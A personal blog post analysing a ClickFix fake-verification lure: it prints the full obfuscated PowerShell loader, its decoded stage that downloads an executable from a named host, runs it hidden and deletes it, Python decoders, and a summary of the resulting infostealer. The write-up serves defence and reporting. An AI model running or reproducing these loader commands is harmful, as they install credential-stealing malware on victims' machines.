Tried to Buy a Pint, Finding a Trojan: My First Malware Analysis

blog.michaelrbparker.com · birdculture · 6 days ago
This story all started with me and some mates wanting to get a drink in one of those cool, trendy hipster places you see online (I promise I'm only 20; apparently that sentence makes me sound old). The site loads for a brief moment and then redirects you to a Cloudflare-looking page. You press verify and bam, you get a pop-up. This pop-up:

(screenshot of the pop-up not reproduced here)

Then it auto-copied something to my clipboard. Now, to non-technical folk, I can see them falling for this. I cannot lie, for a split second I was wondering if it was real. Me being a Tux follower (Linux user), the script wouldn't have run even if I wanted it to. I moved on, trying to continue planning my holiday, but wondering how this worked kept scratching at my head. So let's take a look at this script. Now I want to stress this point: DO NOT RUN THIS SCRIPT.

The Obfuscated PowerShell

A fake "verify you are human" page that ends with "paste this into the Run box" is the lure security vendors have been calling ClickFix. What landed on the clipboard was the one-liner below. The long hex string in `$d` is shown here exactly as it was copied but joined back into one line: the page wraps it for display, but in the real script it is a single string.

```powershell
<# I am not a robot - Cloudflare ID : d9141de62779862f #>
$k = 'oFoCAK';
$d = '4b281531222f0c7b481812321c320a2e6f050a3241102439192f0c26112406281b0e20250e210a311c7155150a2034390632161333241b290c2c2d7634151630352e0268212635653c230c3633221b3f3f312e3f0025002f15321f2332797b1f03355e717a6f1b7b252c282542160e37296b4b2301357b1f2a0b3f6369103c3f1c372426410f206d112a1b2e32797b0c0a323d222f2f002b292a2d2e212702266962467d2126366626320a2e616626320a2e15321f234f0728390a251b2c33324f6b3f2235234f621b636c0d00340c263d041a32420d3427037d4b257c01002f016e112a1b2e4f67356b471d3c3a323f0a2b410a0e653f271b2b1c7155010a37132a0122002e0722032321222c2e476f446466650a3e0a646662546200287c7b54200031696f067b5f7865224f6b033761784f6b0e2d256b42280037616f002d54672860446f14373332140f01352e200a6b382623190a371a26323f4f6b3a31286b48610737353b1c7c406c23220824003a322803330d6d2232003340223122402f01272433413607337e2a5222036535240423017e27280b225a21767259200d2574280d735972752f0e710e22207f58715c25237f5f72587470285b7e5d72247f0d7e0b7071785f730a27792f09735722737a577e4930332852240e2f2d220a240e2f2d2e1d35002d6f28002b492e2e2f0a7b0c2f2e3e0b200322332e48614f6e0e3e1b00062f246b4b204f6e14380a040e3028283f271d302825087d0625691f0a351b6e112a1b2e4f672762146200287c7a1223033024303c320e3135663c2a0a26316b42150a202e250b354f713c360c271b2029303c320e3135663c2a0a26316b42150a202e250b354f713c36542f096b6c2500324f6b152e1c324213203f07664b2568621423172a353654151b22333f42161d2c222e1c354f6e072203233f2235234f6209636c1c06280b2c36181b3f0326610306220b262f701b341638132e022919266c021b2302636c0706320a3120273f271b2b616f096642052e390c234f6e04391d291d02223f062901631222032301372d322c29013728251a231220203f0c2e143e7a6c54151b22333f42161d2c222e1c354f6e162201220034123f162a0a6309220b220a2d613b00310a3132230a2a03636c0a1d211a2e24251b0a0630356b486b212c11390020062f246c4361421428250b29181035320323486f660306220b262f6c436142002e260227012766674b281531222f0c7d0a3b283f';
$r = '';
for ($p = 0; $p -lt $d.Length; $p += 2) {
    $r += [char](([convert]::ToInt32($d.Substring($p, 2), 16)) -bxor [int][char]$k[$p/2 % $k.Length])
};
& ([ScriptBlock]::Create($r))
```

Breaking Down the Decryption Loop

Working through the end of the script, there is this:

```powershell
$r = '';
for ($p = 0; $p -lt $d.Length; $p += 2) {
    $r += [char](([convert]::ToInt32($d.Substring($p, 2), 16)) -bxor [int][char]$k[$p/2 % $k.Length])
};
& ([ScriptBlock]::Create($r))
```

The loop starts at `$p = 0` and increments by 2 (`$p += 2`). It takes the two characters at that position as their own little string, `$d.Substring($p, 2)`, and converts that hex pair to an integer with `[convert]::ToInt32(..., 16)`. We have the key `oFoCAK`, which is 6 letters long, and each hex pair is one byte, so the byte index is `$p / 2`. Taking that modulo the key length (`$p/2 % $k.Length`, which PowerShell evaluates left to right as `($p/2) % 6`) picks the letter of the key we want to use. In Python the same lookup is `k_char = k[(i // 2) % len(k)]`. The `-bxor` is where the maths happens: we XOR the ciphertext byte with the key letter. (David, if you're reading this, I hope you're proud I remembered something from my cryptography class.) The final step casts the result back to a `[char]`, appends it to `$r`, and once the loop finishes `[ScriptBlock]::Create($r)` compiles the decoded text and `&` runs it. Nothing readable is ever written to disk, but the decoded block does land in PowerShell's script block log (event 4104 in Microsoft-Windows-PowerShell/Operational) if that is enabled, which is the first place a defender should look.

Now I was not willing to do this all by hand, so I wrote this Python script:

```python
k = 'oFoCAK'
d = 'THE HEX CODE'   # paste the $d string from above here, as one line
r = ""
for i in range(0, len(d), 2):
    hex_pair = d[i:i + 2]                 # two hex digits = one byte
    int_val = int(hex_pair, 16)
    k_char = k[(i // 2) % len(k)]         # byte index modulo key length
    r += chr(int_val ^ ord(k_char))       # XOR with the key letter
print(r)
```

The Decoded Payload

NOW I WANT TO STRESS THIS AGAIN. DO NOT. I SAY DO NOT. COPY THIS INTO YOUR TERMINAL. (I have also reported this to the bar, Cloudflare, and the domain registrar.)
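Before looking at the decoded text, here is an added example of the same decoder done the way I would want it for triage. It is not the script from the original post and none of its names come from the malware: it generalises the loop above (strips the line wraps the listing has, rejects odd-length blobs, pulls `$k` and `$d` out of the wrapper by regex), and instead of executing the result the way the loader does it reports the URLs, hosts and behaviours found in it. The `STAGE1_SAMPLE` / `STAGE0_SAMPLE` fixture is constructed here with the placeholder host `example.invalid`; the only real data it touches is the first eight bytes of the `$d` string above, which decode to the `$nzrcdc=` that opens the payload shown next.

```python
"""Decoder and triage helper for the XOR-over-hex PowerShell loader above.

Added example, not the blog author's script. Function and fixture names are
my own choices; only KEY and the 16-hex-digit prefix come from the page.
"""
import re
from binascii import unhexlify
from urllib.parse import urlparse

KEY = "oFoCAK"   # the key hard-coded in the loader on this page


def xor_hex_decode(hex_blob: str, key: str) -> str:
    """Undo the loader: hex pair -> byte -> XOR with key[i % len(key)] -> char.

    Whitespace is stripped first because the listing above is line-wrapped;
    a space inside a hex pair would otherwise make the conversion fail.
    """
    clean = re.sub(r"\s+", "", hex_blob)
    if len(clean) % 2:
        raise ValueError("odd-length hex string: the blob is truncated or corrupted")
    data = unhexlify(clean)
    return "".join(chr(b ^ ord(key[i % len(key)])) for i, b in enumerate(data))


def xor_hex_encode(text: str, key: str) -> str:
    """Inverse of xor_hex_decode; used only to build the constructed fixture."""
    return "".join(f"{ord(c) ^ ord(key[i % len(key)]):02x}" for i, c in enumerate(text))


def extract_loader(stage0: str):
    """Pull $k and $d out of the obfuscated wrapper, tolerating stray spaces."""
    k = re.search(r"\$\s*k\s*=\s*'([^']*)'", stage0)
    d = re.search(r"\$\s*d\s*=\s*'([^']*)'", stage0)
    if not (k and d):
        raise ValueError("no $k/$d assignments found; not this loader family")
    return k.group(1), d.group(1)


# Behaviours the decoded stage on this page exhibits, as regexes over the text.
BEHAVIOURS = {
    "downloads a file": r"Invoke-WebRequest|DownloadFile|DownloadString|certutil|curl",
    "hidden process launch": r"Start-Process[^;]*-WindowStyle\s+Hidden",
    "random drop path under TEMP": r"\$env:TEMP.*GetRandomFileName",
    "deletes its own dropper": r"Remove-Item",
    "builds code at runtime": r"ScriptBlock\]::Create|Invoke-Expression|\biex\b",
}


def triage(script: str) -> dict:
    """Decode the wrapper if present and report IOCs. Never executes anything."""
    try:
        key, blob = extract_loader(script)
        decoded = xor_hex_decode(blob, key)
    except ValueError:
        decoded = script                      # already plain PowerShell
    text = script + "\n" + decoded            # wrapper and payload both count
    urls = re.findall(r"https?://[^\s'\"]+", decoded)
    hosts = sorted({urlparse(u).hostname for u in urls})
    hits = [name for name, pat in BEHAVIOURS.items() if re.search(pat, text, re.I)]
    return {"decoded": decoded, "urls": urls, "hosts": hosts, "behaviours": hits}


# Constructed fixture: a cut-down stage 1 with a placeholder host (not the real
# download server), wrapped the same way the real loader wraps its payload.
STAGE1_SAMPLE = (
    "$t=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());"
    "Invoke-WebRequest -Uri 'https://example.invalid/api/index.php?a=dl' -OutFile $f;"
    "Start-Process -FilePath $f -WindowStyle Hidden;"
    "Remove-Item -LiteralPath $f -Force"
)
STAGE0_SAMPLE = (
    f"$ k = '{KEY}' ; $ d = '{xor_hex_encode(STAGE1_SAMPLE, KEY)}' ; "
    "& ([ScriptBlock]::Create($r))"
)

if __name__ == "__main__":
    # The first 8 bytes of the real $d above decode to the variable name that
    # opens the next section.
    print(xor_hex_decode("4b281531222f0c7b", KEY))
    report = triage(STAGE0_SAMPLE)
    print(report["hosts"], report["behaviours"])
```

Run it against the real blob by pasting the `$k`/`$d` one-liner into `triage()`; the decoded text is returned as a string, never compiled or executed, so it is safe to do on an analysis box.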
```powershell
$nzrcdc = '[System.Net.ServicePointManager]::SecurityProtocol=[System.Net.SecurityProtocolType]::Tls12;$t=Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());New-Item -ItemType Directory -Path $t -Force|Out-Null;$f=Join-Path $t ([System.IO.Path]::GetRandomFileName()+''.exe'');$ok=0;for($i=0;$i -lt 3 -and -not $ok;$i++){try{Invoke-WebRequest -Uri ''https://bigboysclub.cyou/api/index.php?a=dl&token=fcdd5b796fbf5cb5614da7aaa4773fb404771c4821e4b8d30305ed8df58a2188&src=ballieballerson.com&mode=cloudflare'' -OutFile $f -UseBasicParsing;if(Test-Path $f){$ok=1}else{Start-Sleep -Seconds 2}}catch{Start-Sleep -Seconds 2}};if(-not (Test-Path $f)){exit};Start-Process -FilePath $f -WindowStyle Hidden;try{Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue}catch{};'; Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile', '-WindowStyle', 'Hidden', '-Command', $nzrcdc; exit
```

Now this is quite a lot to take in, so let's restructure it to be easier to read:

```powershell
$nzrcdc = '
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;

$t = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());
New-Item -ItemType Directory -Path $t -Force | Out-Null;
$f = Join-Path $t ([System.IO.Path]::GetRandomFileName() + ''.exe'');

$ok = 0;
for ($i = 0; $i -lt 3 -and -not $ok; $i++) {
    try {
        Invoke-WebRequest `
            -Uri ''https://bigboysclub.cyou/api/index.php?a=dl&token=fcdd5b796fbf5cb5614da7aaa4773fb404771c4821e4b8d30305ed8df58a2188&src=ballieballerson.com&mode=cloudflare'' `
            -OutFile $f -UseBasicParsing;
        if (Test-Path $f) { $ok = 1 } else { Start-Sleep -Seconds 2 }
    } catch { Start-Sleep -Seconds 2 }
};
if (-not (Test-Path $f)) { exit };
Start-Process -FilePath $f -WindowStyle Hidden;
try { Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue } catch {};
';

Start-Process -WindowStyle Hidden powershell -ArgumentList '-NoProfile', '-WindowStyle', 'Hidden', '-Command', $nzrcdc;
exit
```

So what does this actually do? The outer shape first: everything the pasted one-liner does directly is spawn a second, hidden PowerShell (`-NoProfile` so nothing in the user's profile gets in the way, `-WindowStyle Hidden`) with the whole `$nzrcdc` string as its `-Command`, and then `exit`, so the window the victim opened vanishes immediately and all the real work happens in a child process. The doubled single quotes (`''.exe''`, `''https://...''`) are simply how a single quote is escaped inside a single-quoted PowerShell string.

Inside that string we start off by forcing TLS 1.2. On older Windows PowerShell and .NET builds the default protocol list stops at TLS 1.0, which a TLS 1.2-only server would reject, so this is the attacker making sure the download does not fail. It is the same boilerplate line countless legitimate scripts carry, so on its own it tells a defender nothing.

```powershell
$t = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName());
New-Item -ItemType Directory -Path $t -Force | Out-Null;
```

This creates a randomly named directory under the user's Temp folder to drop the executable into.
It will be in the format `C:\Users\<username>\AppData\Local\Temp\<random>`, so an example would be `C:\Users\TEAMAN\AppData\Local\Temp\213ig4u`. Once we have the random path we need a random file name:

```powershell
$f = Join-Path $t ([System.IO.Path]::GetRandomFileName() + ".exe");
```

So we could end up with `C:\Users\TEAMAN\AppData\Local\Temp\213ig4uz\i8o76aew.exe`. (One detail worth knowing for when you go hunting: `GetRandomFileName()` returns an 8.3-style name with a dot in it, such as `lfxgq5n1.ggp`, so the real artefacts look more like `...\Temp\lfxgq5n1.ggp\a3k9wq0b.z1c.exe`; the examples above are simplified.)

This is just another layer of obfuscation, and it is aimed at the OS and its security tooling rather than the user. With a fresh directory and file name every time there is no fixed path or name to blocklist or to match against a published indicator of compromise, and Temp is writable without admin rights. A scanner that only matches known paths or names would miss it; anything with real-time scanning checks the file when it is written and executed regardless of where it lands, and if your antivirus genuinely ignores Temp, replace it.

The next step is to download the payload that the attacker has tried so hard to hide:

```powershell
$ok = 0;
for ($i = 0; $i -lt 3 -and -not $ok; $i++) {
    try {
        Invoke-WebRequest `
            -Uri "https://bigboysclub.cyou/api/index.php?a=dl&token=fcdd5b796fbf5cb5614da7aaa4773fb404771c4821e4b8d30305ed8df58a2188&src=ballieballerson.com&mode=cloudflare" `
            -OutFile $f `
            -UseBasicParsing;
        if (Test-Path $f) { $ok = 1 } else { Start-Sleep -Seconds 2 }
    } catch { Start-Sleep -Seconds 2 }
}
```

The attacker uses an integer flag, `$ok`, as a boolean recording whether the binary has been downloaded from bigboysclub.cyou (just the domain name gives me the ick). The for loop wraps a try/catch and attempts the download up to three times, sleeping two seconds after each failure. If the file still is not there after the third attempt the script simply exits, leaving nothing behind but an empty, randomly named directory in Temp. The `src=ballieballerson.com` parameter in the URL names the site the victim came from, presumably the compromised bar site, so the download server knows which lure page sent them. If the download succeeds, `Start-Process -FilePath $f -WindowStyle Hidden;` is called. This runs the malicious binary that has just been dropped in a hidden window, meaning the victim cannot see it running.
Once the binary has been started, the script then runs:

```powershell
Remove-Item -LiteralPath $f -Force -ErrorAction SilentlyContinue
```

This deletes the downloaded executable so that the binary is left running with no file behind it. Two caveats are worth knowing. First, it removes only the file, not the random directory `$t`, which stays behind in Temp as a small forensic breadcrumb. Second, Windows will not let you delete an executable whose image is mapped into a running process, which is exactly why the error is silenced: the delete only goes through if the binary has already exited or copied itself somewhere else, otherwise the file stays on disk until the process ends. The file being removed as soon as it started made me assume that it was just an installer for another bit of malware that would run on the system, though at 2 MB it would have been either incredibly heavily obfuscated for an installer or incredibly poorly written. We will find out shortly that I was wrong.

Reverse Engineering the Binary

So the next job was working out why, how, or what this binary does. I really had no idea where to start, so after a bit of googling I found out about something called REMnux. Starting off with an app called Cutter, it became clear that the Trojan was written in Go. I couldn't get any further with Cutter (that's a user issue more than anything), so I moved to Ghidra with the Go extension. There was a lot of gibberish I did not fully understand, but looking at the libraries being imported it was definitely designed to make requests to an outside network. I spent probably another hour or two messing around with hex data (again, I had never attempted to reverse engineer or analyse malware before this) before I decided the best thing to do would be to run it and monitor the network traffic.

Identifying the Malware

I started off looking for Windows monitoring tools and came across a site called Hybrid Analysis, which did a lot of the heavy lifting here. Once the binary was uploaded, it was identified as a RedCap infostealer Trojan [1] using ChaCha20 to encrypt traffic and send it to the attacker's server (the IP will not be mentioned here), while spoofing its user agent as a macOS Firefox user agent. Odd, considering this was a Windows VM with Firefox not installed. I'm assuming this is to help the traffic blend in and avoid antivirus detection.
It was also running an infostealer routine that went after the standard cookie and password stores for both Chrome and Firefox, attempted to change the local proxy settings to capture future network traffic, and set up persistence so that it survives the original file being deleted at the end of the PowerShell script mentioned earlier. Finally, it tried and failed to pass itself off as Postman with a code-signing certificate. In theory a valid signature would make Windows, and users, more inclined to trust the binary and less likely to block it; in this case the certificate was invalid and corrupted, so the signature check fails.

Reporting and Takedown

Being the good little programmer I am, I was filling out abuse forms throughout this process. When we first found the domain bigboysclub.cyou it was reported to both Cloudflare and the domain registrar. Halfway through writing this, about three hours later, I went to grab some screenshots only to find that Cloudflare had already removed all the redirects (an email saying something had happened would be nice, but I guess I'll let them slide this time). The VPS was reported to Hetzner and I'll add an edit if I get a response.

Final Thoughts

I have never done any form of reverse engineering before, or looked behind the curtain, and it's exciting as well as interesting. If anyone has any suggestions about how you would have done this, or some resources on reverse engineering, please send a message on the Discord. (Also, as that website has been hacked, I never got to book a table at the bar. If you know any fun drinking spots in London, also send me a message; I'm running out of ideas.)

If you enjoyed the blog or want to continue the discussion, check out the Discord. To get updates about future articles, feel free to follow the RSS feed. And if you feel like buying this university student a cup of tea, check out the Buy Me a Coffee icon in the bottom right.
[1] RedCap is a malware family categorised as a backdoor and information stealer, which threat actors use to harvest credentials and compromise systems, particularly by targeting Microsoft Exchange Servers.